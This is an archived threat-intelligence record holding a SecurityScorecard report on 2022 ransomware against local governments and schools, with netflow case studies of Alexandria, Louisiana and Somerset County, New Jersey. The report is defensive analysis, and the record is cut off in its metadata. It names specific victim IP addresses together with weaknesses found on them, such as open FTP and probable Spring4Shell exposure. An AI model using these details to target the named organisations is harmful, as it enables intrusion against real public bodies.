{
	"id": "8d32b395-78ed-4271-86aa-75b5bd972234",
	"created_at": "2026-04-06T00:15:34.476209Z",
	"updated_at": "2026-04-10T03:29:39.988708Z",
	"deleted_at": null,
	"sha1_hash": "3fc64f07e8dcc714888ed5bef6a950dfdc981c1e",
	"title": "The Increase in Ransomware Attacks on Local Governments - SecurityScorecard",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 654756,
	"plain_text": "The Increase in Ransomware Attacks on Local Governments -\r\nSecurityScorecard\r\nArchived: 2026-04-05 19:39:25 UTC\r\nExecutive Summary of Local Government Ransomware Attacks\r\nSecurityScorecard’s threat research team undertook a broad survey of recent developments in ransomware\r\nactivity affecting the state and local government and education (SLED) sectors.\r\nThe ALPHV/BlackCat and LockBit 2.0 ransomware groups appear to have been responsible for a\r\nnotable portion of activity targeting SLED organizations in 2022.\r\nRansomware groups have continued to modify their TTPs throughout 2022; although their main points\r\nof entry (phishing, compromised remote access services, and exploitation of known vulnerabilities) have\r\nremained broadly consistent, their specific methods have evolved; SecurityScorecard observed\r\nransomware groups exploiting new Apache and Confluence vulnerabilities in Q2 2022 attacks.\r\nThird-party risks have also persisted, with ransomware attacks against SLED institutions’ vendors\r\nleading to client data breaches.\r\nSecurityScorecard can support SLED organizations both before and after ransomware attacks:\r\nSecurityScorecard’s security rating platform gives organizations an outside-in view of their existing\r\ncybersecurity posture to take action against inherent vulnerabilities and risks. In addition, our\r\nAttack Surface Intelligence (ASI) and Automated Vendor Detection (AVD) products can enable\r\ncontinuous monitoring of their and their vendor’s digital assets.\r\nOur Cyber Risk Intelligence as a Service (CRIaaS) offering can provide tailored insights about\r\nthe threats facing them.\r\nIn the event of a successful or attempted attack, SecurityScorecard’s professional services unit can\r\nsupport incident response efforts.\r\nIntroduction\r\nIn Spring 2022, Lincoln College announced that it would permanently close on May 13 and noted that a\r\nDecember 2021 ransomware attack had contributed to its closure. Unfortunately, at the same time that Lincoln\r\nCollege was struggling in vain to remain open, other SLED (state, local and educational) institutions were\r\nsuffering new ransomware attacks, despite years of consistent evidence of ransomware groups’ particularly heavy\r\ntargeting of those sectors. On March 30, the Federal Bureau of Investigation (FBI) issued a private industry\r\nnotification (PIN) warning of the continued targeting of local governments by ransomware operators, noting that\r\nlocal Government Facilities Sector (GFS) entities were the second-most frequent victims to report ransomware\r\nincidents to the FBI in 2021. The notification goes on to highlight four incidents that affected county governments\r\nand identifies phishing, remote desktop protocol (RDP) compromise, and exploitation of unpatched vulnerabilities\r\nas the three most common means by which threat actors initially accessed victims’ systems. In another relevant\r\nPIN, the FBI noted in May 2022 that members of illicit forums regularly sell educational institutions’ credentials.\r\nExposed credentials may in fact be both a cause and effect of some attacks. Not only do ransomware groups often\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 1 of 13\n\nuse previously exposed credentials to access victim networks but, as the PIN notes, some attackers also use an\r\nintrusion that ultimately results in a ransomware deployment to harvest credentials from victim organizations. In a\r\nsummary study of 2021 ransomware incidents, Sophos surveyed a group of 499 information technology\r\nprofessionals in the education sector. They found that 44% of respondents’ organizations had experienced\r\nransomware attacks that year. Of those attacks, 58% resulted in the successful encryption of data, and 35% of\r\nsuccessful encryptions led to ransom payments. Moreover, Sophos’ statistics suggest that educational institutions\r\nmay be less capable of detecting attacks than other targets. The percentage of attacks resulting in encryption for\r\ntargets in education (58%) was 4% higher than the overall average (54%.) In comparison, the percentage of\r\nrespondents reporting that attacks were stopped before encryption was 2% lower in education than overall (37%\r\nvs. 39%) and the percentage that paid ransoms was 3% higher (35% vs. 32%). Sophos also surveyed local\r\ngovernment personnel in its study, finding that local governments were the organizations least capable of\r\ndisrupting attacks prior to encryption: 69% of respondents from local governments that suffered attacks reported\r\nthose attacks led to the encryption of their organizations’ data. Moreover, local governments were among the\r\nransomware victims to pay ransoms most frequently: 43% of local government respondents reported that their\r\norganizations had paid a ransom after an incident. Meanwhile, Emsisoft’s retrospective report on 2021\r\nransomware incidents found that ransomware attacks had affected 77 state and local governments and 1,043\r\nschools that year, leading to an estimated minimum of 36 data breaches in local government and 118 in education.\r\nThis may indicate decreased targeting of local government, as 2021’s 77 victim organizations is considerably\r\nfewer than the 113 recorded in both 2019 and 2020. Emsisoft additionally notes that smaller municipalities also\r\nmade up a larger proportion of 2021 victims, in contrast to previous years, whose ransomware victims included\r\nlarge cities like Atlanta and Baltimore. Unlike local government, according to Emsisoft’s research, the number of\r\nvictims in the education sector did not decrease notably in 2021. 2020 saw 84 attacks against 26 colleges or\r\nuniversities and 58 school districts (impacting 1,681 individual schools within those districts). In 2021, 88\r\nincidents occurred, and the number of higher-education victims remained 26, while the number of school districts\r\nincreased to 62. However, the number of schools affected by attacks against those districts decreased to 1043. This\r\nsuggests that ransomware groups are targeting smaller educational organizations more often, just as they appear to\r\nhave begun targeting smaller municipalities. While 2022 is not over yet (and full-year statistics are therefore not\r\nyet available), early indications are that ransomware attacks against targets in both local government and\r\neducation will persist, if not increase. In early April, Recorded Future reported that 37 schools had suffered\r\nransomware attacks in the first quarter of 2022 alone, compared to 127 in all of 2021. This included seven\r\nconfirmed victims in higher education:\r\nNorth Carolina A\u0026T University\r\nOhlone College\r\nSavannah State University\r\nUniversity of Detroit Mercy\r\nCentralia College\r\nPhillips Community College of the University of Arkansas\r\nNational University College (NUC University)\r\nIn response to a later attack, another expert reported at the end of April that ransomware had affected 12\r\ninstitutions of higher education up to that point in the year, with 10 of those incidents involving data theft,\r\nadditionally noting that 9 school districts comprised of 234 individual schools had suffered attacks up to that point\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 2 of 13\n\nin 2022. Like the estimates above, these figures would suggest that more attacks on the education sector will occur\r\nin 2022 than 2021, were they to continue at the same rate. Unlike education, however, attacks against local\r\ngovernments may be decreasing. According to one estimate, as of early June, 22 local governments had suffered\r\nattacks, but by the same point in 2021, 36 local government attacks had occurred.\r\nParticularly Active Groups: ALPHV/BlackCat and LockBit 2.0\r\nOf the year’s publicly-disclosed ransomware attacks against higher education and local government, the LockBit\r\n2.0 and ALPHV/BlackCat groups have figured particularly prominently. Of the above reports, ALPHV claimed\r\nresponsibility for the attacks on North Carolina A\u0026T and Phillips Community College, while LockBit 2.0 claimed\r\nthe University of Detroit Mercy and NUC University attacks. ALPHV subsequently claimed additional attacks on\r\nFlorida International University and Regina Public Schools and LockBit 2.0 claimed an attack against Mercyhurst\r\nUniversity (though shortly after claiming the attack, LockBit removed Mercyhurst’s entry from its leak site). Most\r\nrecently, on June 3, 2022, the town of Alexandria, Louisiana reported that it had suffered a breach resulting from\r\nan attack by ALPHV. Commentators have noted that the group took a particularly aggressive stance against media\r\ncoverage in addition to making more predictable threats to leak data directed at state officials. ALPHV (also\r\ntracked as BlackCat) and LockBit 2.0 are both ransomware-as-a-service (RaaS) operations that reportedly conduct\r\ndouble and, in some cases, triple extortion against their victims: in addition to demanding a ransom to decrypt\r\nencrypted systems, they not only threaten to publish stolen data on their leak sites, but also occasionally launch\r\ndistributed denial of service (DDoS) attacks against their victims to apply additional pressure by way of additional\r\ndisruptions to their operations and recovery efforts. Both groups also often employ Cobalt Strike in the course of\r\ntheir attacks. As its name suggests, LockBit 2.0 is a continuation of the earlier LockBit ransomware operation,\r\nwhich first surfaced in 2019 (LockBit 2.0 appeared in Summer 2021). According to an FBI advisory released in\r\nFebruary 2022, LockBit 2.0’s affiliates have accessed target systems by a variety of means, including remote\r\naccess purchased through initial access brokers, exploitation of vulnerabilities both novel and published, and\r\nthrough malicious insiders. More recent analysis of the group found that LockBit 2.0’s operators have sought\r\naffiliates who can help compromise target systems through phishing, remote services including RDP and VPN,\r\npreviously exposed credentials, and insider access. ALPHV first appeared in early December 2021. Early analysis\r\nfound the BlackCat strain of ransomware to be particularly sophisticated and that it was the first professionally-deployed ransomware to be written in Rust. Later, in April 2022, the FBI warned that as of March,\r\nALPHV/BlackCat had already compromised 60 organizations and noted that the operation likely shared personnel\r\nwith the BlackMatter and DarkSide groups. DarkSide achieved considerable notoriety for its attack on Colonial\r\nPipeline, which likely led the group to rebrand, first as BlackMatter and later as BlackCat. That warning notes that\r\nattackers normally exploit previously exposed credentials to access victim systems, subsequently escalating\r\nprivileges and moving laterally while disabling security systems to avoid detection. As with many other\r\nransomware operations, the group steals documents from victim systems in order to conduct secondary extortion\r\nand uses Cobalt Strike after initially compromising victim systems. More recent research has found that some\r\nBlackCat affiliates have exploited a Microsoft Exchange vulnerability to initially access unpatched servers–\r\nalthough the research does not explicitly name the Exchange vulnerability in question, it may be the widespread\r\nProxyLogon vulnerability that was first disclosed in early 2021, given that researchers link to guidance about it in\r\nthe newer report.\r\nOngoing Risks of Local Government: Third-Party/Supply Chain Breaches\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 3 of 13\n\nThird-party risk has been a recurring topic of concern within the cybersecurity community, and third-party\r\nbreaches have proven particularly relevant in discussions of the impact of ransomware upon government and\r\neducational institutions. In addition to direct attacks against them, ransomware attacks against other businesses\r\nhave also led to breaches of government and educational institutions’ data. In July 2020, Blackbaud, a technology\r\nprovider that caters to nonprofit organizations, notified customers (including many K-12 schools, colleges, and\r\nuniversities) that a February ransomware attack had also exposed their data, but that Blackbaud had paid the\r\nransom, partially in hopes of preventing the attackers’ publication of the stolen data. The Accellion FTA\r\ncompromise that became prominent in early 2021 is a particularly wide-ranging example of the intersection\r\nbetween supply-chain cyber risk and ransomware. Between December 2020 and January 2021, Accellion patched\r\na group of vulnerabilities in its 20-year-old FTA file transfer software. However, by that point, threat actors had\r\nalready exploited them to steal data from Accellion customers and partners and subsequently began contacting\r\nthose customers and partners to threaten to leak the stolen data and demand a ransom; by February 2021, victim\r\ndata had begun appearing on the Cl0p ransomware group’s leak site. Analysts estimated at the time that the attacks\r\naffected 100 organizations, 25 of which experienced severe data thefts. Educational institutions, including\r\nStanford University, the University of California system, the University of Colorado, the University of Miami, the\r\nUniversity of Maryland, Baltimore, and at least one state government were among the affected organizations.\r\nThus far, breaches at two different educational technology (edtech) providers, Illuminate Education and Battelle\r\nfor Kids, have affected public school districts’ data in 2022; at least one of these (Battelle) was the result of a\r\nransomware attack. Illuminate Education announced in January that service disruptions reported by customers,\r\nincluding the New York City public school system, were the result of an unspecified security incident. Then, in\r\nMarch, Illuminate informed New York City officials that the incident had also led to a data breach that exposed\r\n820,000 New York City students’ personal data. Some features of this incident resemble a ransomware attack, but\r\npublic sources have not yet formally identified it as one. In a similar event publicly acknowledged as a\r\nransomware incident, in April, a group of Ohio school districts began announcing breaches resulting from a\r\nDecember 2021 attack against edtech provider Battelle for Kids, with the much larger Chicago public school\r\nsystem announcing in May that the Battelle attack had also impacted it, leading to a breach of 500,000 students’\r\nand 60,000 teachers’ data. Even in the wake of their respective security incidents, SecurityScorecard’s platform\r\nindicates that Battelle and Illuminate both suffer from issues attackers (including ransomware operators) could\r\nexploit. Previous leaks have exposed personal information belonging to employees of both organizations, and\r\nother leaks have exposed passwords associated with Battelle email addresses. An attacker could use exposed\r\npersonal information to craft compelling phishing messages, and ransomware attacks have often used employee\r\ncredentials (like passwords that employees use across different accounts and fail to change after their exposure in\r\na breach) to access target systems. Both could be susceptible to phishing attacks: 17 domains attributed to Battelle\r\nfor Kids lack Sender Policy Framework (SPF) records, and the SPF record for one Illuminate Education\r\nsubsidiary, IO Education, indicates a misconfiguration. SPF can help prevent email spoofing, but in its absence,\r\nthreat actors can more easily craft and distribute phishing emails that can be more convincing because they appear\r\nto have originated from within a target organization. SecurityScorecard also observed open FTP services at an IP\r\naddress attributed to Battelle as recently as June 17. Speaking generally, attackers may take an interest in file-sharing services because they offer a means of accessing victim data, but some ransomware groups have taken a\r\nparticular interest in it. For example, Sophos warned in February 2021 that it had observed the Conti group using\r\nFTP to steal victim data. Software in use on June 20 and 21 at Illuminate-attributed IP addresses also appeared to\r\nbe affected by high-severity vulnerabilities first identified in 2016 and 2018, which could indicate patch\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 4 of 13\n\nmanagement issues that could be especially concerning given that ransomware often exploits unpatched\r\nvulnerabilities. Other issues, while not necessarily targeted by ransomware groups, may nonetheless indicate an\r\nongoing risk. SecurityScorecard has previously researched the links between our scorecard factors and\r\nransomware attacks to identify which of the issues we observe are more prevalent among ransomware victims\r\nthan in other organizations. Many of the issue types identified in this research also affect Battelle for Kids and\r\nIlluminate Education. Exposed personal information (observed for both companies, as discussed above) was\r\nalmost 40% more prevalent among the ransomware cohort than non-victim organizations. SecurityScorecard\r\nobserved TLS services that support weak protocols in use in Battelle’s and Illuminate’s networks; this finding is\r\nover 30% more prevalent among ransomware victims than non-victims. SecurityScorecard’s earlier research also\r\nnoted that two other TLS flaws, TLS Service Supports Weak Cipher Suite, and Certificate Without Revocation\r\nControl, are respectively 30% and 29% more prevalent in the ransomware cohort than in the control group.\r\nSecurityScorecard has found a TLS Service at a Battelle for Kids-attributed IP address to support a weak cipher\r\nsuite and a TLS certificate at an Illuminate Education-linked IP address to lack revocation control. Together, these\r\nfindings suggest that both Battelle for Kids and Illuminate Education may share a profile similar to many\r\nransomware victims, even if only one of the two companies has publicly disclosed a ransomware incident in\r\nrecent months.\r\nLocal Government Ransomware Attack Case Studies\r\nAlexandria, Louisiana\r\nSecurityScorecard’s investigation into the attack against the government of Alexandria, Louisiana, by the ALPHV\r\ngroup revealed some possible insights, including a series of suspicious network flows (netflows) in the days\r\nbefore the attack. On May 30 and 31, 151 flows between 199.38.59[.]80 (an IP address attributed to the City of\r\nAlexandria) and 149.255.169[.]10 took place over UDP. These occurred within fairly narrow timeframes: the 25\r\nflows on May 30 occurred between 16:26:25 and 16:28:54 UTC, and the 126 flows on May 31 all occurred\r\nbetween 11:22:14 and 11:42:12 UTC. SecurityScorecard’s netflow tool has previously linked 149.255.169[.]10 to\r\nmalicious bot and Cobalt Strike activity. ASI has, moreover, revealed remote access services in use at open ports\r\nat the Alexandria IP address in question:\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 5 of 13\n\nASI also found a port indicative of VPN activity open at the other IP address involved in these flows; Point-to-Point Tunneling Protocol (PPTP) is a VPN protocol that operates on TCP port 1723, a port that ASI indicates is\r\nopen at 149.255.169[.]10. While PPTP is widely regarded as outdated, VPNs can also use UDP (the protocol over\r\nwhich the observed communication occurred) in its stead.\r\nWhile VPNs do not necessarily indicate malicious activity, threat actors use them regularly to obfuscate their\r\ntraffic and communications. These 151 flows make up the bulk of the observed traffic involving this particular\r\nAlexandria-attributed IP (199.38.59[.]80), which comprised 186 flows in total and may represent a particularly\r\nconcentrated period within a broader pattern of suspicious activity. The first flow within SecurityScorecard’s\r\nsample took place between 199.38.59[.]80 and 41.93.45[.]129 on May 21. Other vendors have observed this IP\r\naddress leading to a download of a malicious javascript file, and ASI observed a malware infection active there on\r\nthe same day as this flow:\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 6 of 13\n\nThe malicious file in question has, moreover, figured in previous SecurityScorecard research, which linked it to\r\npossible Russian C2 infrastructure. The number of bytes observed in this flow (1500, or 15 KB) is only slightly\r\nlarger than the javascript file in question (10.66 KB). The following day (May 22), the same Alexandria IP address\r\ncommunicated with a neighboring IP address, 41.93.45[.]130. Vendors have linked that address to malicious\r\nactivity and ASI observed malware infections at it only slightly before this flow:\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 7 of 13\n\nThen, on May 23, a 327-KB data transfer from 178.128.55[.]198 took place. Nine vendors have detected\r\nmalicious activity involving this IP address; it has hosted a domain that appears to impersonate Apple (icdn-appieid[.]com) and, more recently, was observed leading to a download of a malicious text file detected as\r\nWin32.Trojan.Raasj.Auto. These three flows used TCP, but after them, many others, like the 151 involving\r\n149.255.169[.]10, used UDP. This sudden shift to UDP may reflect the use of a VPN to communicate with threat\r\nactor infrastructure following an initial compromise represented by these first three suspicious TCP flows. While\r\nthis traffic may be benign (internal log data could further elucidate it), these findings suggest that the above-discussed IP addresses merit further investigation, as the timing of the traffic involving them suggests that they\r\nmay have played a role in the attack against the Alexandria government.\r\nSomerset County, New Jersey\r\nOn May 24, the government of Somerset County, New Jersey, announced it had suffered a ransomware attack\r\nearlier that day, which disabled the county’s email system and disrupted Somerset County Clerk and Surrogate\r\nservices requiring internet connectivity or access to county databases. Following the disclosure of the incident,\r\nSecurityScorecard researchers consulted our internal scan data and netflow tool in hopes of enriching the publicly\r\navailable information about the attack. SecurityScorecard observed several vulnerabilities commonly leveraged by\r\nransomware groups on Somerset County’s network. SecurityScorecard observed that Somerset County’s main\r\ndomain, somerset[.]nj[.]us, lacked an SPF (sender policy framework) record as recently as May 23. SPF can help\r\nprevent email spoofing by verifying that emails claiming to originate from a given domain are coming from a\r\nserver with a legitimate relationship to that domain, thus reducing the risk of successful phishing attacks. A threat\r\nactor could, for example, have begun spoofed emails from somerset[.]nj[.]us to phish Somerset County employees\r\nat the beginning of the ransomware attack against the county. As SecurityScorecard’s recent cases have also\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 8 of 13\n\nrevealed, phishing remains a common means of initial access for ransomware. With that said, recent years have\r\nalso seen ransomware groups use a remote desktop protocol to access victim systems with increasing frequency.\r\nSecurityScorecard additionally observed FTP services publicly available at three Somerset County-attributed IP\r\naddresses, 64.206.95[.]16, 64.206.95[.]15, and 64.206.95[.]23. As discussed above, researchers have observed\r\nransomware groups and other threat actors exploiting FTP in the past. As seen above, exploitation of known\r\nvulnerabilities also remains a common feature of ransomware attacks, and SecurityScorecard observed a number\r\nof CVEs affecting Somerset County IP addresses. Five of these, in particular, 64.206.95[.]22, 64.206.95[.]27,\r\n64.206.95[.]24, 64.206.77[.]196, and 64.206.95[.]21 may suffer from one especially prominent and relatively\r\nrecent vulnerability, Spring4Shell, the exploitation of which, some commentators note, could facilitate the\r\ndeployment of ransomware. SecurityScorecard’s netflow data revealed a notable amount of traffic that may\r\nindicate attackers’ use of Cobalt Strike against Somerset County. From April 24 to May 24 (the month leading up\r\nto the Somerset County government’s detection of the attack), the netflow data available to SecurityScorecard\r\nrevealed 41,972 flows between the IP addresses attributed to Somerset County and IP addresses linked to Cobalt\r\nStrike command-and-control infrastructure. Some of this traffic may have been part of the attack reported on May\r\n24. According to Cisco research conducted in 2020, 66% of ransomware attacks observed that year used Cobalt\r\nStrike. More recently, in February 2022, Cybereason’s Global SOC Team analyzed an attack they attribute to a\r\nConti ransomware affiliate that began with spear phishing directed at employees of the victim organization and\r\nlater deployed Cobalt Strike. Given the SPF issue mentioned above, it is not unthinkable that the attack against\r\nSomerset County followed a similar trajectory. To identify the most concerning IP addresses involved in the\r\nalmost 42,000 flows that could reflect the use of Cobalt Strike against Somerset County, SecurityScorecard\r\nresearchers first limited the results to those involving Somerset County IP addresses where SecurityScorecard’s\r\nplatform observed issues, as these issues could represent vulnerabilities that adversary may be more likely to\r\ntarget. They then sorted the results by byte count in order to identify the Cobalt Strike-tagged IP addresses\r\ninvolved in the largest data transfers. The top 10 IP addresses linked to Cobalt Strike and involved in large data\r\ntransfers to or from Somerset County are the following (in order of byte count):\r\n1. 165.225.242[.]248\r\n2. 208.87.239[.]180\r\n3. 208.40.200[.]194\r\n4. 192.216.142[.]51\r\n5. 162.142.125[.]211\r\n6. 174.128.243[.]54\r\n7. 154.89.5[.]80\r\n8. 70.39.102[.]189\r\n9. 128.14.133[.]58\r\n10. 174.128.243[.]54\r\nResearchers then identified additional traffic involving other IP addresses located in the same countries as these\r\nknown malicious IPs when the countries in question are ones with which a US local government would be\r\nunlikely to communicate. This led SecurityScorecard to observe large data transfers between vulnerable Somerset\r\nassets and IP addresses in India and Bangladesh in the weeks leading up to the attack. Researchers observed a total\r\nof 2,109 flows between the county government’s assets and Indian IP addresses. Traffic between Indian IP\r\naddresses and those attributed to the Somerset County government is in and of itself something of an anomaly: the\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 9 of 13\n\nvast majority of traffic occurred within the US, as reflected in the graph below:\r\nDespite the low frequency of the traffic, the volume of the data it transferred was quite large: flows involving\r\nIndian IP addresses had an average byte count of 3,363,767, more than double the overall average (1,576,056\r\nbytes). Because traffic between Somerset County IPs and Indian IPs appears uncommon, the amount of data\r\ntransferred in that traffic was anomalously large. The transfers occurred in the lead-up to a ransomware\r\ndeployment, and threat actors have been observed abusing Indian infrastructure in previous attacks. Of the IP\r\naddresses appearing in the attack, 103.240.208[.]197 may represent a particular cause for concern.\r\nSecurityScorecard’s netflow tool has associated it with Cobalt Strike, and researchers detected a transfer of\r\n156,000 bytes between it and one vulnerable Somerset County IP address, 64.206.95[.]4, on May 24, the date\r\nSomerset County detected and disclosed the attack against it. In contrast to those located in India, the Bangladeshi\r\nIP addresses communicating with Somerset County assets were both rarer and transferred smaller amounts of data.\r\nBetween April and May 24, they only appeared in 40 flows and had an average byte count of 506,863. However,\r\nin addition to the links SecurityScorecard’s netflow tool established between some of these IPs and malicious bot\r\nactivity, the heavy concentration of the traffic on certain specific dates appears somewhat suspicious. Of these 40\r\nflows, 18 occurred on May 8 and involved larger data transfers than the overall average of 506,863; on May 8, the\r\nflows’ average byte count was 1,113,500. Although the IP involved, 103.92.85[.]202, has not previously been\r\nlinked to ransomware, it likely merits investigation, if not blocking, because traffic between Somerset County IPs\r\nand Bangladeshi IPs appears uncommon. The amount of data transferred in that traffic was anomalously large and\r\nthe transfers occurred in the lead-up to a ransomware deployment. Moreover, other members of the cybersecurity\r\ncommunity have previously linked it to brute force attacks targeting RDP. Ransomware groups often compromise\r\nRDP for initial access. Traffic on another day, May 12, represented the next-largest portion of the flows observed:\r\n14 occurred on that day. They all involved one Bangladeshi IP, 37.111.205[.]165, which another vendor has linked\r\nto Cobalt Strike. Their average byte count (6,957.5 bytes), however, was considerably smaller than the one\r\nobserved on May 8.\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 10 of 13\n\nFindings from Ransomware Attacks on Local Government\r\nRecent incident response efforts in which SecurityScorecard was involved do, in general, indicate that\r\nransomware groups’ TTPs have remained largely continuous with those employed in 2021, with the exploitation\r\nof known vulnerabilities remaining a consistent feature of recent attacks. However, the vulnerabilities exploited\r\nhave changed as researchers publish new CVEs. Thus far in 2022, Confluence, GitHub, and Apache\r\nvulnerabilities have figured particularly prominently in SecurityScorecard cases. Since its publication in February,\r\nCVE-2021-44228 (an Apache vulnerability also tracked as “Log4Shell” because it affects Apache’s Log4j\r\nsoftware library) has figured in approximately six incidents to which SecurityScorecard responded. More recently\r\npublished research may also reflect the exploitation of Confluence vulnerabilities observed by SecurityScorecard.\r\nAnalysts first reported that they had observed the Cerber ransomware group exploiting CVE-2021-26084. This\r\nvulnerability permits attackers to execute arbitrary code on affected versions of Atlassian’s Confluence Server and\r\nData Center products in December 2021. Atlassian later advised Confluence users that a new remote code\r\nexecution vulnerability, CVE-2022-26134, was under active exploitation on June 2. By June 11, researchers had\r\nobserved at least two ransomware groups (including the aforementioned Cerber) exploiting it. In one particularly\r\nglaring incident, SecurityScorecard observed 64 open CVEs, including both Log4Shell and a GitHub vulnerability\r\non a client’s system. Despite targeting newer vulnerabilities, systems that remain unpatched long after the\r\npublication of a CVE will also remain low-hanging fruit for attackers. In one recent engagement with a municipal\r\nemergency response service, SecurityScorecard determined that a threat actor had originally accessed the target’s\r\nnetwork through its VPN, exploiting a vulnerability in its firewall, which the victim organization had not updated\r\nin over a year. In this particular case, the adversary remained in the victim’s network for months and loaded, but\r\nultimately did not deploy ransomware on its systems. The decision not to encrypt this organization’s devices, and\r\nparticularly the time it took for the threat actors to reach that decision, may reflect a wider trend. Despite these\r\ngeneral continuities with previously established trends, recent cases have also revealed two novel features of\r\nransomware operations in 2022: increasing dwell time and aggression. In the municipal emergency service\r\nincident, SecurityScorecard determined that the attacker spent 90 days in the victim system prior to detection.\r\nAccording to SecurityScorecard experts, this reflects a broader trend: threat actors are taking their time more.\r\nThreat actors often do not know what data they are stealing during exfiltration, but if they have gone undetected,\r\nthey increasingly appear to be willing to spend the time to figure out what data they can access and what it is\r\nworth. In previous cases, SecurityScorecard was able to determine that attackers viewed some data but did not\r\nexfiltrate it, likely because they believed that they could not monetize it, a belief likely shaped by time\r\nconstraints–they were unwilling or unable to spend the time to study victim data and make an informed\r\nassessment of its value. However, longer dwell times may suggest that actors hope to make more informed\r\ndecisions about what data they can monetize. More than just seeking to evaluate the data available to them, in the\r\nmunicipal emergency response case, the adversaries disabled the victim’s anti-virus software to avoid detection.\r\nThey then spent some of their 90-day dwell time attempting further vertical and lateral movement, perhaps in\r\nhopes of breaching more lucrative targets. From the emergency service, for example, attackers tried to access the\r\ninternal systems of other local government bodies, including city hall, and launched DNS poisoning attacks from\r\nthe infected system. SecurityScorecard has also observed ransomware groups taking increasingly aggressive steps\r\nto pressure their victims to pay ransom. In addition to the secondary and tertiary extortion methods mentioned\r\nabove, attackers have taken more personal steps in recent incidents, contacting friends and family members of\r\nexecutives of some affected organizations to exert additional pressure.\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 11 of 13\n\nConclusion: How to Prevent Ransomware Attacks on Local Governments\r\nAlthough some statistics suggest that the targeting of educational institutions by ransomware operators has\r\ndecreased in 2022, their targeting of local governments may have increased. SecurityScorecard’s findings suggest\r\nthat a number of issues affecting organizations in these sectors could render them particularly vulnerable to\r\nransomware. To reduce their vulnerability, organizations should make every effort to keep software up to date;\r\nunpatched software is easier to exploit. In addition to those appearing on previously-circulated lists of CVEs\r\nfrequently exploited by ransomware, those observed in recent SecurityScorecard engagements may merit\r\nparticular attention. They should also remain on guard against phishing: frequent training would complement the\r\nuse of SPF, DKIM, and DMARC, which can reduce the risk of email spoofing. While some credential exposures\r\nmay be unavoidable, organizations can also reduce the risks associated with these exposures by advising\r\nemployees against password reuse, requiring 2FA, and requiring fairly stringent length and complexity\r\nrequirements for passwords. While SecurityScorecard gathered and analyzed this information to provide an\r\noverview of some of SecurityScorecard’s threat intelligence and investigation capabilities as they relate to SLED\r\norganizations’ exposure to ransomware, the discussion above may not serve as an exhaustive enumeration of every\r\npossible threat and risk involving ransomware. However, SecurityScorecard can offer more tailored support for\r\nSLED organizations both before and after ransomware attacks.\r\nHow to Prevent Ransomware Attacks on Local Governments\r\nTo prevent ransomware attacks on local governments, these institutions must have up-to-date cybersecurity\r\nprocedures that are followed by everyone. Here are some of the best ways to address and prevent these types of\r\nattacks:\r\nIncident Response Support\r\nIn the event of a confirmed or suspected ransomware attack, SecurityScorecard can provide managed incident\r\nresponse and digital forensics teams as a professional service to customers driven by a large group of former law\r\nenforcement and private sector experts with decades of experience in the space. For immediate support from our\r\nteams, please contact Ranell Gonzales.\r\nCyber Risk Intelligence as a Service\r\nSecurityScorecard’s threat research and intelligence could be the competitive advantage SLED organizations need\r\nto stay ahead of today’s fast-moving threat actors. For regular custom insights through our team’s 100+ years of\r\ncombined threat research and investigation experience, or more details on these findings and the other keywords\r\nthat were provided, please contact Ranell Gonzales for a discussion of our Cyber Risk Intelligence as a Service\r\n(CRIaaS) offering. While this report should be considered trustworthy but preliminary, our team can continue\r\ndiving into these details and offer further support by working with on-site staff at local government and\r\neducational institutions. We can, for example, conduct additional analysis on the malware, targets, data transfer\r\ndestinations, and specific context around the leaked credentials at a given organization.\r\nAttack Surface Intelligence\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 12 of 13\n\nSecurityScorecard’s new Attack Surface Intelligence (ASI) solution gives you direct access to SecurityScorecard’s\r\ndeep threat intelligence data through a global tab on the ratings platform. ASI analyzes billions of sources to\r\nprovide deep threat intelligence and visibility into any IP address, network, domain, or vendor’s attack surface\r\nrisk, from a single pane of glass. This helps customers do more with the petabytes of data that forms the basis of\r\nSecurityScorecard Ratings, including identifying all of an organization’s connected assets, exposing unknown\r\nthreats, conducting investigations at scale, and prioritizing vendor remediation with actionable intelligence. ASI is\r\nbuilt into SecurityScorcard’s ratings platform through an enhanced Portfolio view or global search across all\r\nInternet assets, leaked credentials, and infections and metadata from the largest malware sinkhole in the world.\r\nAccess ASI today through our Early Access program by filling out the demo request form or contacting Assel\r\nDmitriyeva.\r\nBlueprint for Ransomware Defense\r\nOn August 4, the Institute for Security and Technology’s (IST) Ransomware Task Force (RTF) announced the\r\nrelease of its Blueprint for Ransomware Defense – a clear, actionable framework for ransomware mitigation,\r\nresponse, and recovery aimed at helping organizations navigate the growing frequency of attacks.\r\nSecurityScorecard is proud to be the only security ratings platform to sponsor and participate in the development\r\nof the Blueprint and is one of only 5 organizations who participated in the program’s development. You can see\r\nthe Blueprint for Ransomware Defense here.\r\nSource: https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments"
	],
	"report_names": [
		"the-increase-in-ransomware-attacks-on-local-governments"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
